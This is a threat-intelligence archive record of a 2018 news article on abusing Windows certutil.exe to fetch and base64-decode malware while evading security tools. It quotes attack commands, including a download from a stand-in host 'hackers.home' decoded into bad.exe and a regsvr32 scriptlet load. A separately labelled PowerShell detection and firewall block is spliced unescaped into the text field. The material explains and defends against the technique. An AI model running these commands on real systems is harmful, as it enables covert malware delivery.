{
	"id": "09c31e71-5ba5-412d-af15-a84c0e272a5d",
	"created_at": "2026-04-06T00:13:58.783564Z",
	"updated_at": "2026-04-10T13:12:51.960402Z",
	"deleted_at": null,
	"sha1_hash": "2e9594425cd5b5234b3ffbfea64c74ea79ed6b1b",
	"title": "CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 774756,
	"plain_text": "CertUtil.exe Could Allow Attackers To Download Malware While\r\nBypassing AV\r\nBy Lawrence Abrams\r\nPublished: 2018-04-04 · Archived: 2026-04-05 16:11:01 UTC\r\nWindows has a built-in program called CertUtil, which can be used to manage certificates in Windows. Using this program\r\nyou can install, back up, delete, manage, and perform various other functions related to certificates and certificate stores in\r\nWindows.\r\nOne of the features of CertUtil is the ability to download a certificate, or any other file for that matter, from a remote URL\r\nand save it as a local file using the syntax \"certutil.exe -urlcache -split -f [URL] output.file\".\r\nSecurity researcher Casey Smith tweeted in 2017 his concerns that this method could be used to download malware:\r\ncertutil -urlcache -split -f [serverURL] file.blah\r\nregsvr32.exe /s /u /I:file.blah scrub.dll\r\nMakes a nice pairing.\r\nSmith's concerns were warranted, as attackers have been utilizing CertUtil to download malware for quite a while. A\r\nsample from 2016 utilized it, and a recent Trojan from March 2018 also utilizes it to download various batch files and scripts to\r\nan infected computer.\r\nFigure: CertUtil being used in a recent Trojan\r\nYou may be wondering why attackers would use CertUtil when they already have a foothold on a computer. This is\r\nbecause some computers may be locked down so that unknown applications are unable to download programs. 
By using a\r\nbuilt-in Windows program, there is a possibility that CertUtil would be whitelisted by installed security programs and thus\r\nbe allowed to download files.\r\nThis use of legitimate Windows programs to download and execute malware is not unusual, as the Windows regsvr32.exe\r\nexecutable can be used in a similar manner.\r\nUsing CertUtil+Base64 to Bypass Security Software\r\nToday security consultant and ISC Handler Xavier Mertens published a handler diary that adds a twist to the use of CertUtil\r\nthat may make it easier for attackers' downloads to remain undetected by edge security devices: first base64 encode the\r\nmalicious file so it appears as harmless text, download that text with CertUtil, and then decode it locally, again using CertUtil.exe.\r\nAs already discussed, you can download a file using CertUtil.exe with the following command:\r\ncertutil.exe -urlcache -split -f [URL] output.file\r\nThis downloads the file in its original form and saves it to the computer. The problem with this method is that network\r\nsecurity devices can detect the file as malicious and block it.\r\nTo get past this, Mertens came up with the idea of first base64 encoding the malicious file so that to an edge device it just\r\nappears as harmless text. Then, once the text file is downloaded, the \"certutil.exe -decode\" command can be used to decode\r\nthe base64 encoded file back into the executable.\r\nThis is illustrated in Mertens' handler diary:\r\nC:\\Temp\u003ecertutil.exe -urlcache -split -f \"https://hackers.home/badcontent.txt\" bad.txt\r\nC:\\Temp\u003ecertutil.exe -decode bad.txt bad.exe\r\nThis method potentially gets the payload past an edge device without being detected; it is then converted back into the executable on\r\nthe local machine, where inspection may be weaker. The base64 text is still the complete payload in transit, so an edge device\r\nthat decodes base64 bodies, or that flags certutil fetching something other than a certificate, can still catch it.\r\nWhile I had not known of this actually being used in the wild, MalwareHunterTeam told me that certutil.exe -decode\r\nis already being used. 
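The following PowerShell is an added example for this page; it is not from the article, its author, or Mertens' diary. It hunts process-creation command lines for the two certutil behaviours just described (an -urlcache fetch and a -decode of a downloaded base64 file), flags a renamed copy of certutil.exe that still carries those switches, and includes an outbound firewall rule of the kind the article goes on to recommend. The function names, the Sysmon query and the sample command lines are mine; the sample lines are constructed, not real telemetry.

```powershell
# Added example, not from the article: hunt process-creation telemetry for the
# certutil download/decode pattern and block certutil's outbound network access.
# Function names are my own; the sample command lines below are constructed.

function Find-CertutilAbuse {
    # Returns one object per command line that carries a certutil download
    # or decode switch. Matching is on the switches rather than the image
    # name, so a copy of certutil.exe renamed by the attacker is still
    # flagged (the switches are required for the tool to do anything).
    param(
        [Parameter(Mandatory)] [string[]] $CommandLines
    )
    foreach ($cl in $CommandLines) {
        $hits = @()
        if ($cl -match '(?i)(^|[ ])-urlcache([ ]|$)') { $hits += 'urlcache-download' }
        if ($cl -match '(?i)(^|[ ])-decode([ ]|$)')   { $hits += 'base64-decode' }
        if ($hits.Count -eq 0) { continue }
        [pscustomobject]@{
            CommandLine = $cl
            Behaviours  = ($hits -join ',')
            # certutil switches under a different image name: almost certainly
            # a renamed copy, which a path-based firewall rule will not cover.
            RenamedCopy = -not ($cl -match '(?i)certutil([.]exe)?([ ]|$)')
        }
    }
}

function Get-SysmonCommandLines {
    # Pulls CommandLine from Sysmon ProcessCreate (event 1) on the local host.
    # Assumption: Sysmon is installed and the caller can read its log. The
    # Security log's 4688 events carry the same field once command-line
    # logging is enabled in audit policy.
    param([int] $MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            ([xml]$_.ToXml()).Event.EventData.Data |
                Where-Object { $_.Name -eq 'CommandLine' } |
                Select-Object -ExpandProperty '#text'
        }
}

function Block-CertutilOutbound {
    # Outbound block for both the native and the WOW64 copy of certutil.exe.
    # Requires an elevated shell. The rule is path-based, so it does not stop
    # a renamed copy; pair it with the hunt above.
    foreach ($dir in @('System32', 'SysWOW64')) {
        $exe = [IO.Path]::Combine($env:SystemRoot, $dir, 'certutil.exe')
        if (Test-Path $exe) {
            New-NetFirewallRule -DisplayName ('Block outbound ' + $exe) -Direction Outbound -Program $exe -Action Block -Profile Any | Out-Null
        }
    }
}

# Constructed sample command lines (not real telemetry) for a dry run; the
# URL is the placeholder from Mertens' diary. The third line is benign
# certificate administration and must not be flagged; the fourth is a
# renamed copy still using the download switches.
$Sample = @(
    'certutil.exe -urlcache -split -f https://hackers.home/badcontent.txt bad.txt',
    'certutil.exe -decode bad.txt bad.exe',
    'certutil.exe -addstore Root corp-ca.cer',
    'ct.exe -urlcache -split -f https://hackers.home/badcontent.txt bad.txt'
)
Find-CertutilAbuse -CommandLines $Sample | Format-Table -AutoSize

# On a live host: Find-CertutilAbuse -CommandLines (Get-SysmonCommandLines)
# and, to enforce the article's recommendation, Block-CertutilOutbound
```

Run against the constructed sample, the first, second and fourth lines are reported (the fourth with RenamedCopy set) and the -addstore line is not. Matching on the switches rather than on the image name is deliberate: the firewall rule only binds to the two known paths, so the hunt is what covers a copied and renamed binary.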
Examples of -decode in use can be seen in these samples. In addition, post-publication, we also discovered a\r\nwrite-up from F5 Labs detailing a campaign using CertUtil.exe to install coinminers on Windows.\r\nFurthermore, Kaspersky security researcher Fabio Assolini alerted us that this method has been used by Brazilian coders for\r\nsome time.\r\nBrazilian coders are already abusing this tool for some time, using it to install more malware...\r\n— Fabio Assolini (@assolini) April 4, 2018\r\nAs you can see, new tricks are thought up every day utilizing what would normally be safe and legitimate Windows\r\nprograms. For those who are not using CertUtil to access remote certificates or servers, you may want to lock down its\r\nability to connect to the Internet, for example with an outbound firewall rule for certutil.exe, and alert on process creations\r\nwhere certutil is invoked with -urlcache or -decode.\r\nUpdate 4/4/18 15:13 EST: Updated to include more information about this method being used in the wild.\r\nSource: https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/"
	],
	"report_names": [
		"certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434438,
	"ts_updated_at": 1775826771,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2e9594425cd5b5234b3ffbfea64c74ea79ed6b1b.pdf",
		"text": "https://archive.orkl.eu/2e9594425cd5b5234b3ffbfea64c74ea79ed6b1b.txt",
		"img": "https://archive.orkl.eu/2e9594425cd5b5234b3ffbfea64c74ea79ed6b1b.jpg"
	}
}